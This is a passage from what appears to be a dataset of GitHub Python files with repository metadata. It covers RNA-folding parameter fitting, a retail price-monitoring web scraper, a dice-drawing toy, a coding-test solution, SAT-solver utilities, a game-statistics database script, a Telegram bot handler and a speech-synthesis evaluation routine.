[convert_mm_name(x) for x in hairpinmm_param.index]\n param = hairpinmm_param.keys()[0]\n return hairpinmm_param.to_dict()[param]\n \n \ndef get_adjusted_triloop_terminal_penalty(hairpin_triloop_dict, terminal_penalty_dict):\n \"\"\"\n Called by `lr_dict_2_nupack_json()`\n \"\"\"\n for key,value in hairpin_triloop_dict.items():\n closing_pair = key[0] + key[-1]\n terminal_penalty = terminal_penalty_dict[closing_pair]\n hairpin_triloop_dict[key] = value - terminal_penalty\n \n return hairpin_triloop_dict\n \n \n \ndef lr_dict_2_nupack_json(lr_dict:util.LinearRegressionSVD, template_file:str, out_file:str, \n lr_step:str='full', center_new_parameters=False,\n adjust_triloop_terminal_penalty:bool=True,\n extract_hairpin_mismatch:bool=False, comment=''):\n \"\"\"\n Formats and saves the parameters from the final regression object to \n NUPACK json file\n Args:\n lr_dict - Dict, keys 'dH' and 'dG', \n values are instances of the LinearRegressionSVD() class\n lr_step - str, {'hairpin', 'full'}. If hairpin, only update the hairpin seq params\n center_parameter - bool, if True, center the newly fitted parameters to the template category\n adjust_trilop_terminal_penalty - bool, only used when lr_step = 'hairpin', adjust the \n terminal penalty off the hairpin_triloop parameters\n extract_hairpin_mismatch - bool, if True, fit hairpin_mismatch parameters from triloop \n and tetraloop parameters\n \"\"\"\n param_name_dict = {'dH':'dH', 'dG':'dG_37'}\n \n ori_param_set_dict = fileio.read_json(template_file)\n param_set_dict = defaultdict()\n \n if lr_step == 'full':\n # Only centering new parameters here once as the ones in populated loopup tables are already \n # built on the centered ones\n for p in param_name_dict:\n param_set_dict[p] = coef_df_2_dict(lr_dict[p].coef_df, template_dict=ori_param_set_dict[p],\n center_new_parameters=center_new_parameters)\n if 'intercept#intercept' in lr_dict[p].coef_df.index:\n param_set_dict[p]['intercept'] = lr_dict[p].coef_df.at['intercept#intercept', lr_dict[p].coef_df.columns[0]]\n\n param_set_dict = update_template_dict(ori_param_set_dict, param_set_dict)\n \n ### Populate the lookup tables ###\n for p in param_name_dict:\n coef_p_dict = coef_df_2_dict(lr_dict[p].coef_df)\n \n # `interior_n1_n2` (mismatches)\n for n1, n2 in [(1,1), (1,2), (2,2)]:\n interior_name = 'interior_%d_%d' % (n1, n2)\n for seq in param_set_dict[p][interior_name]:\n seq1, seq2 = seq[:n1+2], seq[n1+2:]\n mm1 = seq2[-2] + seq2[-1] + seq1[0] + seq1[1]\n mm2 = seq1[-2] + seq1[-1] + seq2[0] + seq2[1]\n new_value = param_set_dict[p]['interior_size'][n1+n2-1] + \\\n param_set_dict[p]['interior_mismatch'][mm1] + \\\n param_set_dict[p]['interior_mismatch'][mm2]\n if n1 == 1 and n2 == 1:\n mm_stacks = seq1[0] + seq1[-1] + seq2[0] + seq2[-1]\n try:\n new_value += coef_p_dict['interior_mismatch_stacks'][mm_stacks]\n except:\n pass\n param_set_dict[p][interior_name][seq] = new_value\n \n loop_size_dict = dict(triloop=3, tetraloop=4)\n for loop_size in loop_size_dict:\n hairpin_name = 'hairpin_' + loop_size\n \n loop_seqs = [''.join(x) + util.rcompliment(x[0]) # iterate all possible loop sequences\n for x in itertools.product(list('ATCG'), repeat=loop_size_dict[loop_size] + 1)]\n for seq in loop_seqs:\n hp_mm = seq[-2:] + seq[:2]\n loop_mid = seq[2:-2]\n # `hairpin_loop_mid` is an intermediate parameter not in the final file\n hp_value = coef_p_dict['hairpin_loop_mid'][loop_mid]\n if loop_size == 'triloop':\n # NUPACK adds hairpin_mismatch on top of hairpin_tetraloop but not for triloop\n # sort of funny\n # also takes out terminal penalty\n hp_value += param_set_dict[p]['hairpin_mismatch'][hp_mm]\n hp_value -= param_set_dict[p]['terminal_penalty'][seq[-1]+seq[0]]\n \n param_set_dict[p][hairpin_name][seq] = hp_value\n \n elif lr_step == 'hairpin':\n hairpin_dict = {'dH': dict(hairpin_triloop=None, hairpin_tetraloop=None),\n 'dG': dict(hairpin_triloop=None, hairpin_tetraloop=None)}\n \n for p in param_name_dict:\n if extract_hairpin_mismatch:\n mm_dict = get_hairpin_mismatch(lr_dict[p])\n # hairpin_dict[p]['hairpin_mismatch'] = center_new_param(ori_param_set_dict[p]['hairpin_mismatch'], new_dict=mm_dict)\n\n hairpin_dict[p]['hairpin_tetraloop'] = get_hairpin_seq_df(lr_dict[p], p, loop_len=4).to_dict()[p]\n hairpin_dict[p]['hairpin_triloop'] = get_hairpin_seq_df(lr_dict[p], p, loop_len=3).to_dict()[p]\n \n if adjust_triloop_terminal_penalty:\n hairpin_dict[p]['hairpin_triloop'] = get_adjusted_triloop_terminal_penalty(\n hairpin_dict[p]['hairpin_triloop'], ori_param_set_dict[p]['terminal_penalty'])\n \n # for hairpin_p in ['hairpin_triloop', 'hairpin_tetraloop']:\n # hairpin_dict[p][hairpin_p] = center_new_param(ori_param_set_dict[p][hairpin_p], \n # hairpin_dict[p][hairpin_p])\n \n param_set_dict = update_template_dict(ori_param_set_dict, hairpin_dict)\n \n now = datetime.now()\n current_time = now.strftime(\"%Y-%m-%dT%H:%M:%S\")\n param_set_dict['time_generated'] = current_time\n param_set_dict['comment'] = comment\n param_set_dict['name'] = os.path.split(out_file)[1].replace('.json', '')\n \n fileio.write_json(param_set_dict, out_file)\n\n\n\"\"\" Plotting functions \"\"\"\n\ndef plot_mupack_nupack(data, x_suffix, param, lim, color_by_density=False):\n fig, ax = plt.subplots(1,2,figsize=(4,2))\n kwargs = dict(show_cbar=False, lim=lim, color_by_density=color_by_density)\n plotting.plot_colored_scatter_comparison(data=data, x=param+x_suffix, y=param+'_MUPACK', \n ax=ax[0], **kwargs)\n plotting.plot_colored_scatter_comparison(data=data, x=param+x_suffix, y=param+'_NUPACK_salt_corrected', \n ax=ax[1], **kwargs)\n mae = defaultdict()\n mae['new'] = util.mae(data[param+x_suffix], data[param+'_MUPACK'])\n mae['original'] = util.mae(data[param+x_suffix], data[param+'_NUPACK_salt_corrected'])\n ax[0].set_title('MAE = %.2f' % mae['new'])\n ax[1].set_title('MAE = %.2f' % mae['original'])\n plt.tight_layout()\n\n\n","repo_name":"keyuxi/nnn_paper","sub_path":"nnn/mupack.py","file_name":"mupack.py","file_ext":"py","file_size_in_byte":15337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20537085537","text":"import re\r\nimport os\r\n\r\nfrom scrapy.spider import BaseSpider\r\nfrom scrapy.selector import HtmlXPathSelector\r\nfrom scrapy.http import Request, FormRequest, HtmlResponse\r\nfrom scrapy.utils.response import get_base_url\r\nfrom scrapy.utils.url import urljoin_rfc\r\nfrom urllib import urlencode\r\nimport hashlib\r\n\r\nimport csv\r\nfrom product_spiders.items import Product, ProductLoaderWithNameStrip as ProductLoader\r\nfrom product_spiders.utils import extract_price\r\nfrom scrapy import log\r\nfrom scrapy.shell import inspect_response\r\n\r\nfrom urlparse import urljoin\r\n\r\nimport itertools\r\nimport json\r\nimport copy\r\n\r\nHERE = os.path.abspath(os.path.dirname(__file__))\r\n\r\nclass CellbikesSpider(BaseSpider):\r\n name = 'cellbikes.com.au'\r\n # download_delay = 1\r\n allowed_domains = ['cellbikes.com.au']\r\n # start_urls = ['http://www.cellbikes.com.au/']\r\n start_urls = ['http://www.cellbikes.com.au/c.980629/ShopFlow/sc.environment.ssp?v=4&lang=en_AU&cur=AUD']\r\n brands = []\r\n\r\n # Multiple options\r\n # http://www.cellbikes.com.au/Santini-H2O-Winter-Booties\r\n # GET options json\r\n # http://www.cellbikes.com.au/api/items?include=facets&fieldset=details&language=en&country=AU¤cy=AUD&pricelevel=5&c=980629&n=3&url=Santini-H2O-Winter-Booties\r\n # http://www.cellbikes.com.au/api/items?include=facets&fieldset=details&language=en&country=AU¤cy=AUD&pricelevel=5&c=980629&n=3&id=18593\r\n # \r\n\r\n def parse(self, response):\r\n # inspect_response(response, self)\r\n # return\r\n if 'SC.ENVIRONMENT.CATEGORIES = {' in response.body:\r\n data = '{' + response.body.split('SC.ENVIRONMENT.CATEGORIES = {', 1)[1].split('};', 1)[0] + '}'\r\n j = json.loads(data)\r\n self.brands = [d['itemid'] for d in j['brands']['categories'].values()]\r\n\r\n yield Request('http://www.cellbikes.com.au/', callback=self.parse_home)\r\n\r\n def parse_home(self, response):\r\n # inspect_response(response, self)\r\n # yield Request('http://www.cellbikes.com.au/Bikes/BEST_Fixies_UNDER_500?order=custitem_best_selling:desc&page=2', callback=self.parse_products_list)\r\n # yield Request('http://www.cellbikes.com.au/Santini-H2O-Winter-Booties', callback=self.parse_product)\r\n # yield Request('http://www.cellbikes.com.au/Castelli-Rosso-Corsa-6in-Sock', callback=self.parse_product)\r\n # return\r\n hxs = HtmlXPathSelector(response)\r\n tmp = hxs.select('//ul[@class=\"nav\"]/li[last()]/ul//a/text()').extract()\r\n if tmp:\r\n self.brands = [s.strip() for s in tmp[:-1]] + self.brands\r\n for link in hxs.select('//ul[@class=\"nav\"]/li[position() 3:\r\n tmp = tmp[-3:]\r\n for s in tmp:\r\n loader.add_value('category', s)\r\n # shipping_cost\r\n shipping_cost = '9.90'\r\n\r\n # stock\r\n if not price:\r\n loader.add_value('stock', 0)\r\n else:\r\n tmp = hxs.select('//span[contains(@class,\"stock-status\")]/text()').extract()\r\n if tmp and 'Out' in tmp[0]:\r\n loader.add_value('stock', 0)\r\n else:\r\n loader.add_value('stock', 1)\r\n\r\n product = loader.load_item()\r\n # options = hxs.select('//ul[contains(@id,\"option-custcol\")]/li/a').extract()\r\n # if not options:\r\n # yield product\r\n # return\r\n tmp = hxs.select('//meta[@itemprop=\"url\"]/@content').extract()\r\n if product['price']<=99:\r\n product['shipping_cost'] = shipping_cost\r\n\r\n if not tmp:\r\n yield product\r\n return\r\n else:\r\n # process options\r\n if tmp[0].startswith('/'):\r\n tmp[0] = tmp[0][1:]\r\n if tmp[0].startswith('product/'):\r\n tmp[0] = tmp[0][8:]\r\n url = 'http://www.cellbikes.com.au/api/items?include=facets&fieldset=details&language=en&country=AU¤cy=AUD&pricelevel=5&c=980629&n=3&id=%s' % tmp[0]\r\n else:\r\n url = 'http://www.cellbikes.com.au/api/items?include=facets&fieldset=details&language=en&country=AU¤cy=AUD&pricelevel=5&c=980629&n=3&url=%s' % tmp[0]\r\n yield Request(url, meta={'product':product}, callback=self.parse_options)\r\n\r\n def parse_options(self, response):\r\n # inspect_response(response, self)\r\n # return\r\n product = response.meta['product']\r\n j = json.loads(response.body)\r\n if not j['items']:\r\n yield product\r\n return\r\n fields = [d.get('sourcefrom', '') for d in j['items'][0]['itemoptions_detail']['fields']]\r\n fields = [d for d in fields if d]\r\n if not fields:\r\n yield product\r\n return\r\n # process options\r\n for d in j['items'][0]['matrixchilditems_detail']: # ##\r\n item = copy.deepcopy(product)\r\n item['identifier'] = d['internalid']\r\n # item['sku'] = d['internalid']\r\n # item['name'] = d['itemid']\r\n keys = [re.search(r'custitem\\d+', k).string for k in d.keys() if re.search(r'custitem\\d+', k)]\r\n if keys:\r\n item['name'] += ' - ' + '-'.join([str(d[k]) for k in keys])\r\n if not item.get('brand', None):\r\n for brand in self.brands:\r\n if brand.lower() in d['itemid'].lower():\r\n item['brand'] = brand\r\n break\r\n\r\n price = extract_price(str(d['onlinecustomerprice_detail']['onlinecustomerprice']))\r\n item['price'] = price\r\n\r\n if item['price']<=99:\r\n item['shipping_cost'] = '9.90'\r\n\r\n if d[\"showoutofstockmessage\"]:\r\n item['stock'] = 0\r\n else:\r\n item['stock'] = 1\r\n yield item\r\n","repo_name":"Godsoo/scraping","sub_path":"e-commerce/CompetitorMonitor/product_spiders/spiders/crc_au/cellbikes.py","file_name":"cellbikes.py","file_ext":"py","file_size_in_byte":8456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40864315149","text":"from tkinter import *\nimport random\n\nroot = Tk()\n\ncanvas = Canvas(root,width = 800,height = 800)\ncanvas.pack()\n\ndef circle(x,y,radius,fill):\n canvas.create_oval(x - radius,y - radius,x + radius,y + radius,fill = fill)\n\nclass Dice:\n def __init__(self):\n self.sides = 6\n def roll(self):\n self.num = 5#random.randint(1,self.sides)\n print(self.num)\n if self.num % 2 == 1:\n self.size = 800/((self.num - 1)/2)\n else:\n self.size = 800/(self.num/2)\n i = 0\n while i < self.num:\n canvas.create_line(0,self.size * i,800,self.size*i,width = 10)\n if i == 0 and self.num % 2 == 1:\n circle(400,400,50,fill = \"black\")\n\n elif (self.num - i )% 2 == 0:\n circle(self.size/2,self.size/4 + self.size*((i/2)) + self.size/4,self.size/8,\"black\")\n\n elif (self.num - i )% 2 == 1:\n circle(800 - self.size/2,800 - (self.size/4 + self.size*((i/2))) + self.size/4 + 0,self.size/8,\"black\")\n i += 1\ndice = Dice()\ndice.roll()\n\nroot.mainloop()\n","repo_name":"MaxwellMarcus/bumpingSquares","sub_path":"dice.py","file_name":"dice.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41740305756","text":"n=int(input())\nnumbers=list(map(int,input().split(\" \")))\nsymbols=list(map(int,input().split(\" \")))\nanswers=[]\n\ndef calculate(last_num,symbols,index):\n\tif(n==index):\n\t\tanswers.append(last_num)\n\t\treturn ;\n\telse:\n\t\tfor i in range(0,4):\n\t\t\tif(symbols[i]!=0):\n\t\t\t\tsymbols[i]=symbols[i]-1\n\t\t\t\tif(i==0):\n\t\t\t\t\tcalculate(last_num+numbers[index],symbols,index+1)\n\t\t\t\t\tsymbols[i]=symbols[i]+1\n\t\t\t\telif(i==1):\n\t\t\t\t\tcalculate(last_num-numbers[index],symbols,index+1)\n\t\t\t\t\tsymbols[i]=symbols[i]+1\n\t\t\t\telif(i==2):\n\t\t\t\t\tcalculate(last_num*numbers[index],symbols,index+1)\n\t\t\t\t\tsymbols[i]=symbols[i]+1\n\t\t\t\telif(i==3):\n\t\t\t\t\tlast_num_fixed= last_num>0 and last_num//numbers[index] or (abs(last_num)//numbers[index])*-1\n\t\t\t\t\tcalculate(last_num_fixed,symbols,index+1)\n\t\t\t\t\tsymbols[i]=symbols[i]+1\n\ncalculate(numbers[0],symbols,1)\nprint(max(answers),min(answers))","repo_name":"weightsforfun/forCodingTest","sub_path":"100june/ictstudy/week2/14888.py","file_name":"14888.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19787759051","text":"import argparse\nimport logging\nimport os\nimport pdb\nimport random\nfrom collections import namedtuple, defaultdict\nfrom os.path import join\n\nimport numpy as np\nimport scipy.sparse as sparse\nimport torch\nimport yaml\n\nlogger = logging.getLogger(__name__)\n\nDataSample = namedtuple('DataSample', ['filename', 'formula', 'adj', 'sat'])\n\n\ndef setup():\n parser = argparse.ArgumentParser()\n parser.add_argument('-c', '--config_path', type=str, required=True)\n parser.add_argument('-g', '--gpu', type=int, default=None)\n args = parser.parse_args()\n\n with open(args.config_path) as f:\n config_data = f.read()\n config = yaml.load(config_data)\n\n config['dir'] = join('results', config['name'])\n os.makedirs(config['dir'], exist_ok=True)\n\n log_file = join(config['dir'], 'train.log')\n logging.basicConfig(\n handlers=[logging.FileHandler(log_file, mode='w'), logging.StreamHandler()],\n format='%(asctime)s %(levelname)s %(message)s',\n datefmt='%H:%M:%S',\n )\n logger.setLevel(getattr(logging, config['log_level'].upper()))\n\n logger.info('Configuration:\\n' + config_data)\n\n if config['seed']:\n random.seed(config['seed'])\n np.random.seed(config['seed'])\n torch.manual_seed(config['seed'])\n\n use_gpu = args.gpu is not None and torch.cuda.is_available()\n device = torch.device(f'cuda:{args.gpu}' if use_gpu else 'cpu')\n logger.info(f'Device: {device}')\n\n config['no_eval'] = not config['eval_set']\n\n config = defaultdict(lambda: None, config)\n return config, device\n\n\ndef adj_sign(n, m, occur):\n i = np.repeat(range(n), [len(lst) for lst in occur])\n j = np.concatenate(occur)\n v = np.ones(len(i), dtype=np.int64)\n return sparse.coo_matrix((v, (i, j)), shape=(n, m))\n\n\ndef adj(f):\n n, m, occur = f.n_variables, len(f.clauses), f.occur_list\n adj_pos = adj_sign(n, m, occur[1 : n + 1])\n adj_neg = adj_sign(n, m, occur[:n:-1])\n return (adj_pos, adj_neg)\n\n\ndef adj_batch(adjs, fstack):\n adjp, adjn = list(zip(*adjs))\n return fstack((sparse.block_diag(adjp), sparse.block_diag(adjn)))\n\n\ndef to_sparse_tensor(x):\n x = x.tocoo()\n i = torch.tensor(np.vstack((x.row, x.col)), dtype=torch.int64)\n v = torch.tensor(x.data, dtype=torch.float32)\n return torch.sparse_coo_tensor(i, v, torch.Size(x.shape))\n\n\ndef init_edge_attr(k):\n return torch.cat(\n (\n torch.tensor([1, 0], dtype=torch.float32).expand(k, 2),\n torch.tensor([0, 1], dtype=torch.float32).expand(k, 2),\n ),\n dim=0,\n )\n\n\ndef normalize(x):\n return 2 * x - 1\n\n\ndef unnormalize(x):\n return (x + 1) / 2\n","repo_name":"emreyolcu/sat","sub_path":"code/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"32"} +{"seq_id":"18279890393","text":"import sqlalchemy as db\nimport configparser\nfrom sqlalchemy import orm\nfrom sys import argv\nfrom sys import exit\nimport pandas as pd\nfrom classes.lolparser import LolParser\nimport math\nimport time\nimport datetime\nimport numpy as np\nimport pymysql\nimport os\nimport json\n\n# this script is gonna parse through the json table, get our info, and backfill our table.\nconfig = configparser.ConfigParser()\nconfig.read('./resources/python/general.cfg')\n\ndb_host = config.get('DATABASE', 'db_id')\ndb_user = config.get('DATABASE', 'db_user')\ndb_pw = config.get('DATABASE', 'db_password')\ndb_name = config.get('DATABASE', 'db_name')\n\nengine = db.create_engine('mysql+pymysql://{}:{}@{}/{}'.format(db_user, db_pw, db_host, db_name), pool_size=100, max_overflow = 100)\nconnection = engine.connect()\nmetadata = db.MetaData()\nsm = orm.sessionmaker(bind=engine, autoflush=True, autocommit=False, expire_on_commit=True)\n\nteam_data_table = db.Table('team_data', metadata, autoload=True, autoload_with=engine)\n\nold_data = {} \n\nselect_old_data = \"SELECT * FROM team_data;\"\nold_data = pd.read_sql(select_old_data, LolParser.connection)\n\nnew_data = {}\n\nselect_new_data = \"SELECT * FROM json_data;\"\nnew_data = pd.read_sql(select_new_data, LolParser.connection)\n\nfor row in new_data['match_id']: \n print(\"Updating match {}\".format(row))\n\n if old_data[old_data['match_id'] == row] is not None:\n json_dict = json.loads(new_data[new_data['match_id'] == row]['json_data'].values[0])\n\n teams = json_dict['teams']\n game_result = old_data[old_data['match_id'] == row]['win'].values[0]\n\n our_team = {}\n enemy_team = {}\n\n if teams[0]['win'] == game_result:\n our_team = teams[0]\n enemy_team = teams[1]\n else:\n our_team = teams[1]\n enemy_team = teams[0]\n\n enemy_dragon_kills = enemy_team['dragonKills']\n enemy_rift_herald_kills = enemy_team['riftHeraldKills']\n\n team_data_table_update = db.update(LolParser.team_data_table).values(\n enemy_dragon_kills=enemy_dragon_kills,\n enemy_rift_herald_kills=enemy_rift_herald_kills\n ).where(LolParser.team_data_table.c.match_id==row)\n\n results = LolParser.connection.execute(team_data_table_update)\n else:\n print(\"Hey, uh, {} isn't in our team_data table. Fix me sometime?\".format(row))\n continue\n\nexit()\n","repo_name":"Spaynkee/lol-data-py","sub_path":"resources/python/scripts/enemy_dragon_rift_herald_fill.py","file_name":"enemy_dragon_rift_herald_fill.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6336556529","text":"import json\n\nimport requests\n\nfrom util.constants import TOKEN, URL\n\nWEBHOOK_URL = f\"https://api.telegram.org/bot{TOKEN}/setWebhook?url={URL}\"\n\n\ndef parse_message(message):\n print(json.dumps(message, indent=2, sort_keys=True))\n chat_id = message['message']['chat']['id']\n txt = message['message']['text']\n print(f\"chat_id: {chat_id}\")\n print(f\"txt: {txt}\")\n return chat_id, txt\n\n\ndef send_message(chat_id, text):\n url = f'https://api.telegram.org/bot{TOKEN}/sendMessage'\n payload = {\n 'chat_id': chat_id,\n 'text': text\n }\n req = requests.post(url, json=payload)\n return req\n\n","repo_name":"tristobal/schedule-telegram-bot","sub_path":"telegram/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73909388572","text":"import argparse\nimport os\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = '3'\nfrom resemblyzer import VoiceEncoder\nimport torch\nimport yaml\nfrom torch.utils.data import DataLoader\n\nfrom utils.model import get_model, get_vocoder\nfrom utils.tools import to_device, synth_multi_samples\nfrom dataset import Dataset\n\nimport numpy as np\n\nfrom scipy.io.wavfile import write\nfrom tqdm import tqdm\nimport sys\nfrom mcd import Calculate_MCD\n\nsys.path.append(\"..\")\nfrom resemblyzer import preprocess_wav\n\n\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\ndef acc_metric(speakers_ids, speakers_all, wav_reconstructions_utterance_embeds, \\\n wav_predictions_utterance_embeds, ids2loc_map, loc2ids_map, centroids=None):\n\n if centroids is None:\n # Inclusive centroids (1 per speaker) (speaker_num x embed_size)\n centroids_rec = np.zeros((len(speakers_ids), wav_reconstructions_utterance_embeds.shape[1]), dtype=np.float)\n # calculate the centroids for each speaker\n counters = np.zeros((len(speakers_ids),))\n for i in range(wav_reconstructions_utterance_embeds.shape[0]):\n # calculate centroids\n centroids_rec[ids2loc_map[speakers_all[i].item()]] += wav_reconstructions_utterance_embeds[i]\n counters[ids2loc_map[speakers_all[i].item()]] += 1\n # normalize\n for i in range(len(counters)):\n centroids_rec[i] = centroids_rec[i] / counters[i]\n centroids_rec[i] = centroids_rec[i] / (np.linalg.norm(centroids_rec[i], ord=2) + 1e-5)\n else:\n centroids_rec = centroids\n sim_matrix_pred = np.dot(wav_predictions_utterance_embeds, centroids_rec.T)\n sim_matrix_rec = np.dot(wav_reconstructions_utterance_embeds, centroids_rec.T)\n # pred_locs 512x1\n pred_locs = sim_matrix_pred.argmax(axis=1)\n rec_locs = sim_matrix_rec.argmax(axis=1)\n # calculate acc\n correct_num_pred = 0\n correct_num_rec = 0\n for i in range(len(pred_locs)):\n if loc2ids_map[pred_locs[i]]==speakers_all[i].item():\n correct_num_pred += 1\n if loc2ids_map[rec_locs[i]]==speakers_all[i].item():\n correct_num_rec += 1\n eval_acc_pred = correct_num_pred/float(len(pred_locs))\n eval_acc_rec = correct_num_rec/float(len(pred_locs))\n\n return eval_acc_rec, eval_acc_pred\n\n\ndef assess_all_spk_emo(encoder_spk, encoder_emo, sampling_rate, samples_path,\n mcd_box_plain, mcd_box_dtw, mcd_box_adv_dtw,\n wav_reconstructions_batch, wav_predictions_batch, tags_batch, speakers_batch, emotions_batch,\n cofs_batch):\n # how many speaker in here (value equal to the speaker id)\n speakers_ids = torch.unique(torch.tensor(speakers_batch, dtype=torch.long))\n emotions_ids = torch.unique(torch.tensor(emotions_batch, dtype=torch.long))\n\n # speakers mapping\n ids2loc_map = {}\n loc2ids_map = {}\n for i in range(len(speakers_ids)):\n ids2loc_map[speakers_ids[i].item()] = i\n loc2ids_map[i] = speakers_ids[i].item()\n # emotion mapping\n ids2loc_map_emo = {}\n loc2ids_map_emo = {}\n for i in range(len(emotions_ids)):\n ids2loc_map_emo[emotions_ids[i].item()] = i\n loc2ids_map_emo[i] = emotions_ids[i].item()\n\n # save and reload val (train) samples\n # save\n rec_fpaths = []\n pred_fpaths = []\n for i in range(len(wav_reconstructions_batch)):\n rec_fpath = os.path.join(samples_path, \"wav_rec_{}.wav\".format(tags_batch[i]))\n pred_fpath = os.path.join(samples_path, \"wav_pred_{}.wav\".format(tags_batch[i]))\n\n write(rec_fpath, sampling_rate, wav_reconstructions_batch[i])\n write(pred_fpath, sampling_rate, wav_predictions_batch[i])\n\n rec_fpaths.append(rec_fpath)\n pred_fpaths.append(pred_fpath)\n\n # reload\n print(\"Reloading ...\")\n rec_wavs = np.array(list(map(preprocess_wav, tqdm(rec_fpaths, \"Preprocessing rec wavs\", len(rec_fpaths)))))\n pred_wavs = np.array(list(map(preprocess_wav, tqdm(pred_fpaths, \"Preprocessing pred wavs\", len(pred_fpaths)))))\n # rec_wavs = np.array(list(map(preprocess_wav, (rec_fpaths, \"Preprocessing rec wavs\", len(rec_fpaths)))))\n # pred_wavs = np.array(list(map(preprocess_wav, (pred_fpaths, \"Preprocessing pred wavs\", len(pred_fpaths)))))\n\n # mcd\n print(\"calculate MCD ...\")\n for i in tqdm(range(len(rec_fpaths))):\n # for i in (range(len(rec_fpaths))):\n if i != (len(rec_fpaths) - 1):\n mcd_box_plain.calculate_mcd(rec_fpaths[i], pred_fpaths[i], len(rec_fpaths), average=False)\n mcd_box_dtw.calculate_mcd(rec_fpaths[i], pred_fpaths[i], len(rec_fpaths), average=False)\n mcd_box_adv_dtw.calculate_mcd(rec_fpaths[i], pred_fpaths[i], len(rec_fpaths), cofs_batch[i], average=False)\n else:\n avg_mcd_plain = mcd_box_plain.calculate_mcd(\n rec_fpaths[i], pred_fpaths[i], len(rec_fpaths), average=True)\n avg_mcd_dtw = mcd_box_dtw.calculate_mcd(\n rec_fpaths[i], pred_fpaths[i], len(rec_fpaths), average=True)\n avg_mcd_adv_dtw = mcd_box_adv_dtw.calculate_mcd(\n rec_fpaths[i], pred_fpaths[i], len(rec_fpaths), cofs_batch[i], average=True)\n\n # speaker and emotion: (speakers/emttion_per_batch x utterances_per_se) x embedding_dim\n # Compute the wav embedding for accuracy (spk)\n wav_reconstructions_utterance_embeds_spk = np.array(list(map(encoder_spk.embed_utterance, rec_wavs)))\n wav_predictions_utterance_embeds_spk = np.array(list(map(encoder_spk.embed_utterance, pred_wavs)))\n # Compute the wav embedding for accuracy (emo)\n wav_reconstructions_utterance_embeds_emo = np.array(list(map(encoder_emo.embed_utterance, rec_wavs)))\n wav_predictions_utterance_embeds_emo = np.array(list(map(encoder_emo.embed_utterance, pred_wavs)))\n\n # calcuate accuracy\n # emotion\n # centroids_emo = np.load(\"/mnt/cephfs/home/conggaoxiang/workspace/Project/Resemblyzer/centroids_emo_all.npy\")\n # centroids_emo = np.load(\"/home/conggaoxiang/Desktop/Avatar2/V2C/centroids_emo_all.npy\")\n eval_acc_rec_emo, eval_acc_pred_emo = acc_metric(emotions_ids, emotions_batch, \\\n wav_reconstructions_utterance_embeds_emo,\n wav_predictions_utterance_embeds_emo, \\\n ids2loc_map_emo, loc2ids_map_emo, centroids=None)\n # speaker\n eval_acc_rec_spk, eval_acc_pred_spk = acc_metric(speakers_ids, speakers_batch, \\\n wav_reconstructions_utterance_embeds_spk,\n wav_predictions_utterance_embeds_spk, \\\n ids2loc_map, loc2ids_map)\n\n acc_means_spk = [eval_acc_rec_spk, eval_acc_pred_spk]\n acc_means_emo = [eval_acc_rec_emo, eval_acc_pred_emo]\n avg_mcd = [avg_mcd_plain, avg_mcd_dtw, avg_mcd_adv_dtw]\n\n return acc_means_spk, acc_means_emo, avg_mcd\n\n\ndef calculate_all_acc(preprocess_config2, model_config, model, vocoder, \\\n encoder_spk, encoder_emo, loader, sampling_rate=None, samples_path=None, \\\n mcd_box_plain=None, mcd_box_dtw=None, mcd_box_adv_dtw=None, useGT=False):\n # Evaluation\n counter_batch = 0\n\n for batchs in tqdm(loader):\n wav_reconstructions_batch = []\n wav_predictions_batch = []\n tags_batch =[]\n speakers_batch = []\n emotions_batch = []\n cofs_batch = []\n counter_batch+=1\n for batch in batchs:\n batch = to_device(batch, device)\n with torch.no_grad():\n # Forward\n output = model(*(batch[2:]), useGT=useGT)\n\n # synthesize multiple sample for speaker and emotion accuracy calculation\n wav_reconstructions, wav_predictions, tags, speakers, emotions, cofs = synth_multi_samples(\n batch,\n output,\n vocoder,\n model_config,\n preprocess_config2,\n )\n # merge\n wav_reconstructions_batch.extend(wav_reconstructions)\n wav_predictions_batch.extend(wav_predictions)\n tags_batch.extend(tags)\n speakers_batch.extend(speakers)\n emotions_batch.extend(emotions)\n cofs_batch.extend(cofs)\n\n # calculate metrics\n os.makedirs(samples_path, exist_ok=True)\n acc_means_spk, acc_means_emo, avg_mcd = assess_all_spk_emo(\n encoder_spk=encoder_spk, encoder_emo=encoder_emo, sampling_rate=sampling_rate, samples_path=samples_path,\n mcd_box_plain=mcd_box_plain, mcd_box_dtw=mcd_box_dtw, mcd_box_adv_dtw=mcd_box_adv_dtw,\n wav_reconstructions_batch=wav_reconstructions_batch, wav_predictions_batch=wav_predictions_batch,\n tags_batch=tags_batch, speakers_batch=speakers_batch, emotions_batch=emotions_batch, cofs_batch=cofs_batch)\n if counter_batch == 1:\n acc_sums_spk = acc_means_spk\n acc_sums_emo = acc_means_emo\n sum_mcd = avg_mcd\n else:\n acc_sums_spk = list(map(lambda x: x[0] + x[1], zip(acc_sums_spk, acc_means_spk)))\n acc_sums_emo = list(map(lambda x: x[0] + x[1], zip(acc_sums_emo, acc_means_emo)))\n sum_mcd = list(map(lambda x: x[0] + x[1], zip(sum_mcd, avg_mcd)))\n\n acc_sums_spk = list(np.array(acc_sums_spk)/counter_batch)\n acc_sums_emo = list(np.array(acc_sums_emo)/counter_batch)\n sum_mcd = list(np.array(sum_mcd)/counter_batch)\n return batch, output, acc_sums_spk, acc_sums_emo, sum_mcd\n\n\ndef save_wav(sampling_rate, samples_path,\n wav_reconstructions_batch, wav_predictions_batch, tags_batch):\n rec_fpaths = []\n pred_fpaths = []\n for i in range(len(wav_reconstructions_batch)):\n generated_path = os.path.join(samples_path, 